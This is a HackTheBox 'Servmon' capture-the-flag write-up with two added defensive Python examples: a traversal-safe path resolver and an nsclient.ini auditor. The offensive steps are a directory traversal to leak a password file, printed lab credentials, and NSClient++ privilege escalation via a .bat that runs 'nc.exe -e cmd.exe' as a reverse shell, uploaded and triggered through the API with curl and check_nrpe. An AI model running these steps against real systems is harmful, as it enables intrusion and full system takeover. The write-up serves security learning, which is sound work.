HackTheBox - Servmon Write-up

Information Gathering

Port and service enumeration using nmap

nmap -F -T 5 -Pn

Nmap scan report for
Host is up (0.19s latency).
Not shown: 92 closed ports
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5666/tcp open  nrpe
8443/tcp open  https-alt


The FTP port is open, so let's try an anonymous login here...

username : anonymous
password : anonymous
$ ftp

Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT

Anonymous login was successful. After some enumeration I found some interesting files and two usernames; the files were downloaded with the get command in the ftp shell...

get Users/Nadine/Confidential.txt
get Users/Nathan/Notes to do.txt
$ cat Confidential.txt

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.



$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

On port 80 the NVMS 1000 web application was running. A quick Google search led to a directory traversal vulnerability, so I tried to get this Passwords.txt file through it...

Username : Nadine
Password : L1k3B1gBut7s@W0rk
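The bug used above is a classic directory traversal: the web application joins a client-supplied path onto its web root without checking that the result stays inside it. The following is an added example (not code from the write-up or from NVMS 1000) of how a file-serving handler should resolve such a path, and how the same logic can be reused to flag traversal attempts when reviewing request logs. The web root and the sample requests are constructed assumptions; the handling of backslashes, NUL bytes and repeated URL encoding goes beyond the single case in the write-up.

```python
"""Added example: traversal-safe path resolution for a web root.
WEB_ROOT and all sample requests are constructed for illustration."""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/www/nvms"  # assumed web root, not a path from the target


def _fully_decode(s: str, rounds: int = 3) -> str:
    """Undo URL encoding repeatedly so that '..' encoded twice (%252e%252e)
    is still caught; stop as soon as decoding no longer changes the string."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            return s
        s = decoded
    return s


def resolve_request_path(requested: str, web_root: str = WEB_ROOT) -> str:
    """Map a client-supplied path onto a file under web_root.

    Raises ValueError if the path would escape the root. Steps: decode,
    treat backslashes as separators (Windows file APIs accept both),
    drop NUL bytes outright, normalise '.' and '..', then verify that the
    normalised result is still prefixed by the root directory."""
    decoded = _fully_decode(requested).replace("\\", "/")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Leading slashes would otherwise make posixpath.join discard web_root.
    relative = decoded.lstrip("/")
    candidate = posixpath.normpath(posixpath.join(web_root, relative))
    root = posixpath.normpath(web_root)
    # The trailing '/' stops '/srv/www/nvms2/...' from passing as a prefix hit.
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError(f"path escapes web root: {requested!r}")
    return candidate


def is_traversal_attempt(requested: str) -> bool:
    """Log-review helper: True when the request would have escaped the root."""
    try:
        resolve_request_path(requested)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed sample request paths, as they might appear in an access log.
    for req in ["/index.html", "sub/../index.html", "..%2f..%2fsecret.txt",
                "%252e%252e/%252e%252e/secret.txt", "..\\..\\secret.txt"]:
        print(f"{req!r:40} traversal={is_traversal_attempt(req)}")
```

The check is done on the normalised result rather than by searching the input for `..`, because a blacklist misses encodings and separator variants while the prefix test on the resolved path does not depend on how the input was written.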

The SSH service was also active, as we can see in the nmap scan, so the next step was to log in using these credentials...

scp Nadine@ user.txt

Got User!

Privilege Escalation

In Confidential.txt NSClient is mentioned, so it was time for some more digging...

> dir /s *nsclient*

Directory of C:\Program Files\NSClient++

10/04/2020  19:32             2,683 nsclient.ini
21/04/2020  08:27            29,651 nsclient.log
               2 File(s)         32,334 bytes

There were two easy ways to read the file here...

type nsclient.ini 


nscp web -- password --display

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts =

Only localhost is allowed, so the solution is to use an SSH tunnel, after which we can visit the web page.
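Two things make this step work: the API password sits in nsclient.ini in plain text where a low-privileged user can read it, and `allowed hosts` restricted to localhost is treated as the only access control, which an SSH port forward walks straight past. As an added example (not part of the write-up or of NSClient++ itself), the script below parses an nsclient.ini-style file and reports both conditions, so an administrator can spot them before a user with a shell does. The configuration text is a constructed sample; the `[/settings/default]` section name is assumed from NSClient++ conventions and the password is a placeholder.

```python
"""Added example: audit an nsclient.ini for a plaintext API password and an
'allowed hosts' setting that is being relied on as the only access control.
SAMPLE_INI is constructed for this example; it is not the target's file."""
import configparser
import ipaddress
from typing import List

SAMPLE_INI = """\
; constructed sample modelled on the keys shown in the write-up
[/settings/default]
; Undocumented key
password = CHANGEME-placeholder
; Undocumented key
allowed hosts = 127.0.0.1
"""

LOOPBACK_TOKENS = {"localhost", "127.0.0.1", "::1"}


def parse_nsclient_ini(text: str) -> configparser.ConfigParser:
    """NSClient++ uses ';' comments, '/'-prefixed section names and keys
    that contain spaces; ConfigParser copes with all of these as set here."""
    cp = configparser.ConfigParser(
        allow_no_value=True, strict=False, interpolation=None,
        comment_prefixes=(";", "#"),
    )
    cp.read_string(text)
    return cp


def _is_loopback(token: str) -> bool:
    """True for 'localhost', '::1', 127.0.0.0/8 addresses or networks."""
    if token.lower() in LOOPBACK_TOKENS:
        return True
    try:
        return ipaddress.ip_network(token, strict=False).is_loopback
    except ValueError:
        return False


def audit_nsclient_ini(text: str) -> List[str]:
    """Return one human-readable finding per weakness; [] means nothing flagged."""
    cp = parse_nsclient_ini(text)
    findings: List[str] = []
    for section in cp.sections():
        if cp.get(section, "password", fallback=""):
            findings.append(
                f"{section}: API password stored in plain text; any local user "
                "who can read nsclient.ini can authenticate to the web/API port")
        if cp.has_option(section, "allowed hosts"):
            raw = cp.get(section, "allowed hosts", fallback="") or ""
            hosts = [h.strip() for h in raw.split(",") if h.strip()]
            if not hosts:
                findings.append(
                    f"{section}: 'allowed hosts' is empty, so the host "
                    "restriction cannot be relied on")
            elif any(h in ("*", "0.0.0.0/0", "::/0") for h in hosts):
                findings.append(f"{section}: 'allowed hosts' permits any source")
            elif all(_is_loopback(h) for h in hosts):
                findings.append(
                    f"{section}: 'allowed hosts' is loopback-only; this blocks "
                    "remote clients but not a local user forwarding the port over "
                    "SSH, so the file ACL on nsclient.ini and password rotation "
                    "still matter")
    return findings


if __name__ == "__main__":
    for finding in audit_nsclient_ini(SAMPLE_INI):
        print("-", finding)
```

The loopback finding is deliberately reported even though the setting looks tight: the write-up shows exactly why a network-layer allow-list is not a substitute for protecting the credential itself.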

ssh -L 8443: Nadine@

After some poking around in the web page and some reading of the NSClient++ manual, the best way to exploit this was to use the API. First I created a small .bat file and uploaded it to the temp directory; after that, privesc needs just two commands...

$ cat twh.bat
@echo off
c:\temp\nc.exe 443 -e cmd.exe

$ scp twh.bat Nadine@
$ scp nc.exe Nadine@

and now finally...

$ curl -s -k -u admin -X PUT --data-binary @twh.bat

> C:\Program Files\NSClient++>check_nrpe.exe -c twh

Got Root!